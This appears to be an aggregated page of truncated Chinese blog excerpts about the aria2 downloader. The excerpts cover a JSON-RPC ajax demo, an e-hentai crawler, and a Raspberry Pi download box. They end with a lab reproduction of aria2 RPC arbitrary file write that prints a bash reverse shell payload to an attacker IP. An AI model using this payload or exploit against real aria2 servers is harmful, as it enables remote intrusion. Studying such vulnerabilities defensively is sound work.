aria2

1. aria2 1.1. ajax调用demo 自定义工具下载 下载地址 页面调用 <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title></title> <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.js"></script> </head> <body> </body> <script> //https://static.zhihu.com/heifetz/vendor.7177302d6c7d65981005.js var url1 = "http://localhost:6800/jsonrpc?tm=1569769711558"; var downData=[{ "jsonrpc": "2.0", "method": "aria2.addUri", "id": 456, "params": [ ["http://fastsoft.onlinedown.net/down/PCQQ9.1.8.26211.exe"], { "split": "5", "max-connection-per-server": "5", "seed-ratio": "0" } ] }, { "jsonrpc": "2.0", "method": "aria2

前言 E站爬虫在网上已经有很多了，但多数都只能以图片为单位下载，且偶尔会遇到图片加载失败的情况；熟悉E站的朋友们应该知道，E站许多资源都是有提供BT种子的，而且通常打包的是比默认看图模式更高清的文件；但如果只下载种子，又会遇到某些资源未放种/种子已死的情况。本文将编写一个能自动检测最优下载来源并储存到本地的E站爬虫，该爬虫以数据库作为缓冲区，支持以后台服务方式运行，可以轻易进行分布式扩展，并对于网络错误有良好的鲁棒性。 环境要求 Python3，MySQL，安装了Aria2并开启PRC远程访问 Aria2是一个强大的命令行下载工具，并支持web界面管理，可以运行在window和Linux下。介绍及安装使用可参见 https://blog.csdn.net/yhcad/article/details/86561233 http://aria2c.com/usage.html https://aria2.github.io/manual/en/html/aria2c.html 基础配置 在MySQL中按如下格式建表 表字段说明 字段名称 字段意义 id id主键 comic_name 本子名称 starttime 开始下载的时间 endtime 下载结束的时间 status 当前下载状态 checktimes 遇错重试次数 raw_address e-hentai页面地址 failed

上文写道如何在raspbian上使用TP-LINK TL-725N无线网卡，本文使用该无线网卡实现一个下载机。硬件平台：Raspberry pi。软件平台：操作系统使用raspbian，其他软件包括开源的aria2、webui-aria2以及nginx。aria2是linux平台下的“迅雷”，支持多线程下载、断点续传、支持Http(s)、FTP、BT和Metalinks。由于raspbian源上有aria2，所以直接使用命令$sudo apt-get install aria2来安装aria2。nginx是一个轻量级的、支持高并发的http服务器，广泛的应用在大型服务器的前端以及直接用于小型服务器。由于raspbian源上有nginx，所以直接使用命令$sudo apt-get install nginx来安装nginx。安装完nginx后，在PC机上使用浏览器访问 http://xx.xx.xx.xx:80，若出现Welcom e to nginx!则表示raspberry pi上的http服务器启动成功。webui-aria2是一个开源的aria2的web前端，webui-aria2与aria2通过rpc相互通信。webui-aria2可以在https://github.com/ziahamza/webui-aria2下载。下载完成后将解开的目录内容复制到/usr/share

目录： 简介 漏洞描述 payload 漏洞复现 一、Aria2介绍 　　Aria2是一个命令行下运行，多协议，多来源下载工具（HTTP / HTTPS，FTP，BitTorrent，Metalink），内建XML-RPC用户界面。Aria提供RPC服务器，通过 --enable-rpc 参数启动.Aria2的RPC服务器可以方便的添加，删除下载项目。 二、漏洞描述 　　通过控制文件下载链接，文件储存路径以及文件名，可以实现任意文件写入。同时通过Aria2提供的其他功能，诸如 save-session 等也能轻易地实现任意文件写入指定功能。 三、payload 　　shell脚本: #! /bin/bash /bin/bash -i >& /dev/tcp/192.168.183.129/12345 0>&1 　　站点;http://binux.github.io/yaaw/demo/# 四、复现 　　 靶机ip：192.168.183.134:6800 　　攻击机：192.168.183.129 　　直接访问aria2如下： 　　　　1.rpc通信需要json或xml，直接从网页操作不方便，我们使用第三方UI与目标进行通信，打开 http://binux.github.io/yaaw/demo/# 点击configuration，设置json-rpc路径（原理具体解释参照：